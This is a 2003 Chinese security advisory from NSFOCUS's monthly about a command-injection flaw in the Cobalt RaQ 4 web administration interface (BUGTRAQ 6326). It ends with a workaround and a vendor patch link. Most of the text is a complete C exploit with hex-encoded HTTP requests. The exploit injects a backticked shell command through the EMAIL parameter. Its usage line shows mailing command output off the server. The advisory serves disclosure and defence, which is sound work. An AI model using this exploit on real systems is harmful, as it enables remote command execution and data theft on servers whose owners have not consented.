首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第38期->最新漏洞
日期:2003-01-03
发布日期:2002-12-05
更新日期:2002-12-12
受影响系统:
Cobalt RaQ 4.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 6326
Cobalt RaQ是一个基于Internet的服务应用程序,由Sun微系统公司发布和维护。
Cobalt RaQ WEB管理接口在处理用户提供的EMAIL参数时缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。
攻击者可以向Cobalt RaQ WEB管理接口中的CGI脚本的包含恶意EMAIL参数的请求,由于CGI脚本处理不充分,可导致以WEB进程权限在系统上执行任意指令。
不过这个漏洞只存在安装了RaQ4加固安全包之后的RaQ4服务程序中。
<*来源:grazer (grazer@digit-labs.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103912513522807&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
grazer(grazer@digit-labs.org) 提供了如下测试程序:
// RaQ 4 and possibly others easy remote root compromise
// due to a flaw in the Security Hardening package HEHE!
// Wouter ter Maat aka grazer - http://www.i-security.nl
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>
#define PORT 81 /* default cobalt admin httpd
try 444 if 81 runs with ssl */
// cmpstr
#define found "overflow"
#define done "Starting"
#define exec "mail"
// prototypes
int banner();
int makereq(char *host, char *request, char *cmpstr, int port);
int main(int argc, char *argv[]) {
int retval, port;
char cmd[1024];
char cbuf[1024];
char request2[3096];
// evi1 requests
char request1[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
"\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f"
"\x77\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69"
"\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n\x48\x6f\x73"
"\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";
char req_tmp[] = "\x50\x4f\x53\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
"\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77"
"\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69\x20\x48"
"\x54\x54\x50\x2f\x31\x2e\x31\n\x41\x63\x63\x65\x70\x74\x3a\x20"
"\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67"
"\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d"
"\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65"
"\x2f\x70\x6a\x70\x65\x67\x2c\x20\x2a\x2f\x2a\n\x41\x63\x63"
"\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x6e\x6c\n"
"\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61"
"\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77"
"\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64"
"\x65\x64\n\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64"
"\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c"
"\x61\x74\x65\n\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20"
"\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x3b\x29\n"
"\x48\x6f\x73\x74\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
"\x3a\x38\x31\n";
char request3[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e\x63"
"\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2f"
"\x6f\x76\x65\x72\x66\x6c\x6f\x77\x54\x65\x73\x74\x45\x6d\x61"
"\x69\x6c\x2e\x63\x67\x69\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n"
"\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";
sprintf(cmd, "%s%s%s", "enabled=1&email=`", argv[2], "`&page=overflow\n\n");
sprintf(cbuf, "%s %d %s", "Content-Length:", strlen(cmd)-2, "\n\n");
sprintf(request2, "%s%s%s", req_tmp, cbuf, cmd);
banner();
while(argc < 3) {
fprintf(stderr, " %s <host> <command> <port> \n", argv[0]);
fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\" 444\n");
fprintf(stderr, " default port is set to 81. \n\n");
exit(0); }
if(argc==3) {
port = PORT; }
else {
port = atoi(argv[3]); }
retval = makereq(argv[1], request1, found, port);
if(retval==2) {
printf(" - name cannot be resolved!\n");
exit(0); } if(retval==3) {
printf(" - connect: connection refused! d0h!\n");
exit(0); }
if(retval==404) {
printf(" - this machine is not vulnerable, dweep!\n");
exit(0); }
else {
printf(" + ow yeah, we've found a victim!\n"); }
printf(" ++ Enabling stackguard and creating evil config file...\n");
retval = makereq(argv[1], request2, done, port);
if(retval==404) {
printf(" -- attack failed , sorry! \n");
exit(0);}
else {
printf(" +++ config file written succesfully ! \n"); }
printf(" ++++ Let's get our evil command executed...\n");
retval = makereq(argv[1], request3, exec, port);
if(retval==404) {
printf(" --- attack failed, sorry! \n");
exit(0);}
else {
printf(" +++++ The command : \"%s\"\n +++++ has been run on the server.\n\n", argv[2]); }
}
int banner() {
printf("*************************************************\n");
printf("RaQ 4 remote root exploit - grazer@digit-labs.org\n");
printf("Vulnerable : RaQ4 with Security Hardening Update.\n");
printf(" isn't it ironic? :] \n");
printf("*************************************************\n"); }
int makereq(char *host, char *request, char *cmpstr, int port) {
int fd, sock, chk;
char buf[2000];
struct sockaddr_in addr;
struct hostent *lh;
if ((lh=gethostbyname(host)) == NULL){
return 2; }
bzero(&(addr.sin_zero), 8);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *) lh-> h_addr);
fd = socket(AF_INET, SOCK_STREAM, 0);
if (connect(fd,(struct sockaddr *) &addr ,sizeof(addr)) != 0){
return 3;
}
send(fd, request, strlen(request), 0);
read(fd, buf, 500);
if(strstr(buf, cmpstr)!=0) {
return 200; } else {
return 404; }
close(fd);
return 1;
}
建议:
--------------------------------------------------------------------------------
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 暂时关闭WEB管理接口。
厂商补丁:
Cobalt
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://ftp.cobalt.sun.com/pub/packages/raq4/eng/RaQ4-en-Security-2.0.1-SHP_REM.pkg
版权所有,未经许可,不得转载